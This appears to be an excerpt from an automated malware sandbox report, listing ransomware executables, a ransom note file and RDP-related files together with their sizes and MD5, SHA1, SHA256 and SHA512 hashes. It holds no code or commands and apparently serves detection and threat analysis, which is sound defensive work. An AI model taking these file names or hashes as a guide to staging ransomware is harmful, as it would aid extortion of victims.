                        • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.exe

                          Filesize

                          706KB

                          MD5

                          54a4be7037ecdb031563998906a365cd

                          SHA1

                          e19e35a43087696fc4e7ac0dfeea4ea19fed8f28

                          SHA256

                          248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189

                          SHA512

                          515c6edb804b85cdaa610a275cfda7490884a42dc5c1585681d13d644c0e5b2ef363dff586e24e1a44410db85e49ee3e2c9737b865f1f9e84271dc5800dbd60d

                        • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe

                          Filesize

                          2.5MB

                          MD5

                          60a6656a9282f0a87aeb151a509eda37

                          SHA1

                          67bec70270c252f9ac0836f66a2599f5a7c465a2

                          SHA256

                          a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c

                          SHA512

                          20909c51dc56f60637b09627e220e5a1941a0c61d9d4f5e7060e5c1a7555e93c2040e0d61bfb88bfdf4b817fa1a166c7d71c07603aa4a0413c8da1b3db1ba874

                        • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exe

                          Filesize

                          279KB

                          MD5

                          4233dc042a9e68b1f27147d47350ba92

                          SHA1

                          0fe264e1db45807db51309cf0b3944bdbdd1d485

                          SHA256

                          5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868

                          SHA512

                          c03e542aa427113cd88f9683fa07f446f51e248f3c5112c4b1f36ea20b08fae796c9f99566eb728f46462f0adb74170ddc7c096e265e31ff51dd25411849d957

                        • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe

                          Filesize

                          2.7MB

                          MD5

                          b175c381c21ed8e3d7a12404705b691b

                          SHA1

                          d473d612c4455ae135b9b28a9e99c16d10d90c58

                          SHA256

                          20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37

                          SHA512

                          7aaa71ceffafca907a1898b71b066735b9df7eacf1ae2593c261e9ded1924abc22cc4ebda8e5481bccc32bd8d8f46c43d9e92e36fcaf37dc28b6d09b4bfc328a

                        • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe

                          Filesize

                          88KB

                          MD5

                          eaf94c9a09fe87ea58f0996ae3233a91

                          SHA1

                          8307d6fc8b57b2f86bde7f43d709f3d5d970836a

                          SHA256

                          3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f

                          SHA512

                          d4168e0115f72ed71c231ee30ce232a3b06312431b38a007d86627e5c876c0fce86ea8be70449b07297341037b6643b9977541ca944085d28c65f44e942323fd

                        • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe

                          Filesize

                          691KB

                          MD5

                          134728554409720296acbfd5cecef4ac

                          SHA1

                          cc67c4dae17b6aa23716e5f2855b54521e57e427

                          SHA256

                          2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae

                          SHA512

                          d60ab95f4005c88095492ed4bcff518f6502366548826bc231640c9f3c75b611f3fb536c055b5daad15c35f3c52e4d8f7c5573c94d17b870e7d8f4d2d34bb5f2

                        • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe

                          Filesize

                          1.8MB

                          MD5

                          7d4550dd4c6996057147ecc996b14e9a

                          SHA1

                          d0d68281f8459b5558559fbbf8c6c8ab4ddfec8b

                          SHA256

                          ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d

                          SHA512

                          e0653ac9c92bd134ff43886b4a8a36016660294c134ff11c6cddefe50494923fdcf370c3d96d5538d2c7ef20d216b4d15b914d40002c982c69021ee8998f57df

                        • C:\Users\Admin\Desktop\HOW-TO-DECRYPT-gn9cj.txt

                          Filesize

                          3KB

                          MD5

                          0c6d0a67b942d06fe27f41c7c582cdfe

                          SHA1

                          7e674cf6375b138cabca2706583d4ced7a1aef27

                          SHA256

                          014ea5effc97085b7832512b9ad2a5c4487265eb67e8d7b0920ef2bc8768400c

                          SHA512

                          53ec4509bc58f53419a8923d808c7dfdecf57dc203c37265d061aebab73147720d1c419e79578065a42c3b2a63504370f90516c3f0afad5d6997952592d3a39c

                        • C:\Users\Admin\RDP6\ConnectionClient.exe

                          Filesize

                          1.4MB

                          MD5

                          921cfacfd1cf49e625ef64c0c50a39fe

                          SHA1

                          f1dfa590ee16fb61022dfab0d370b2d6e1ab6026

                          SHA256

                          3df92ad1bae6037e39a80a18dfd0aafe75f42911daab625bd1618c306c367d5d

                          SHA512

                          f95bd6a95bcd6443ee56a1c9b490b4df9129a7cfbff8c42365ee80d1b9fd32e6452f52ddcf75a8a844ecbbc8b52d550fd7d5a54c10a28729cf60754e35fd6737

                        • C:\Users\Admin\RDP6\Session.rdp

                          Filesize

                          970B

                          MD5

                          4092edebdecbd951d472a70ab773e2d3

                          SHA1

                          3726f7bae5b04996519dcb14b97c191408099a85

                          SHA256

                          3b79f0e2fa8a82f00a14f9f1dd9b9a495487bfed6bd1978235627b023bd9d629

                          SHA512

                          b8755f9e816305fc77fe9c0026981536ed60818e3b7e32ed315d1bdead9f887170f09c0f381168d3c2c626e2e842d0a3b86006e2c77e6f9f17de9af1dc6aeffe

                        • C:\Users\Admin\RDP6\Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.txt

                          Filesize

                          1KB

                          MD5

                          b949be5207c126c47f0e9568c425c0a9

                          SHA1

                          c9bf430ab09db0d711940211314d578d423dfaf2

                          SHA256

                          6a145074fa80b03722f364728f662ac7911aaceaddd12856678e239398a33eea

                          SHA512

                          917b6e651d816d5d64acc6bcc453a375e35c49fb8901182bbe76944870ee6b7ddb199b34b4b00fce5239bcf0eca6728b62fa17302f93f38aefed86b59b3087cf

                        • C:\Users\Admin\RDP6\TsCredentials.exe

                          Filesize

                          137KB

                          MD5

                          e45b9771404521d44d411b3ce9f6c8ac

                          SHA1

                          b6f13100ade2b42f0ae148b7b23987d0dbbebf5f

                          SHA256

                          165a4240ed4bff512c5a6e69bb77d2606c9fc0e6273db1acb4e7e643d364f814

                          SHA512

                          60bd27fc02bb0f82e19fce92d84d4037d8488aa0d18b448747da6c266cc8c3e56b07a83401da4b28ea9b4cac77b5ba15134f53fad73407a22aa7ba032aa1e798

                        • C:\Users\Admin\RDP6\bkgsc.bmp

                          Filesize

                          8KB

                          MD5

                          0a3767472082815dd5126983fd004f34

                          SHA1

                          c41dc8b199b4d2cc0dfa9e0eb612e0fc3eff9fec

                          SHA256

                          91ca63fe192bf1bac2cc5405b2b0494f417028dbb7429e02a0a465977eb355dd

                          SHA512

                          ea7deea4d980057fda994eb856fc537c1e7d8b918ba95db246a4d667f2a54b1468373fcdc818a7b753d6ebb0ac107acca24ea849a4c27f4065301a68cae081d1

                        • C:\Users\Admin\RDP6\bkgsc.bmp

                          Filesize

                          7KB

                          MD5

                          feb0692918248950d909d114b957d722

                          SHA1

                          6858973ee8e05a16aabae9065f10617d4147e826

                          SHA256

                          3c1fb9294d8e0c12d608d3d59a798d3b065a06c1f845fdbceafd22b31096c10a

                          SHA512

                          d9e7eb8746686b3864ec25b662e05747ed35c954650c6feb064417abfa93257eef1862235bd3d60c0f9098cdcb0f915025325b9fd1d853b32b5d23a187b851f7

                        • C:\Users\Admin\RDP6\bkgscblue.bmp

                          Filesize

                          8KB

                          MD5

                          be7e85a3d27a6489b6f0a8b3d552f41f

                          SHA1

                          62d938fac0779c9d722dce8b927aedd8268483af

                          SHA256

                          a6d8f953a1cc5c121a27ddedab7acdee19b95877f45f97e67617ac8a20eef161

                          SHA512

                          7f0b9b1fef129b870014434acd5fecd48cfc52b48b824419a257fe88254fa5fd60babe71aa98700830fd1bf06a0539dc2aca74ae14e4f9ab5cbe2d489aa6c046

                        • C:\Users\Admin\RDP6\bkgscpink.bmp

                          Filesize

                          8KB

                          MD5

                          664f744146c579405c94f2641276de27

                          SHA1

                          f2c1bb74de77b1713845f19d94b4a1a39214b37b

                          SHA256

                          707aa269153242c45da813a38a012f99363d74c68fd5df45457fc7a771350c9e

                          SHA512

                          855ffa5dd14dc7ee3262ca2f5e978515db6d0a0cdd0a87000c1def07236bec97787e846850163cda51fe1d5cd92cbb2331c1fd0bdd9ac23ae336f59a01f3c530

                        • C:\Users\Admin\RDP6\ico2.ico

                          Filesize

                          161KB

                          MD5

                          b523bebd004768f96ffeec26fe0c3a44

                          SHA1

                          4f060b59fbb8e91f8f347844ddd62138ab0d1a88

                          SHA256

                          f256ed6478e5644232411ac4ab0935ead22796581cf64c7e423fabd4d3fd8a7d

                          SHA512

                          8b51263e3440fe18a3e35a3ffb10eecee898c6ca8bab4ef32833912178ff02d6e92903107d55dbcf961c73a5576be9e2f04dc43cdda15f7a728f149ae66971d8
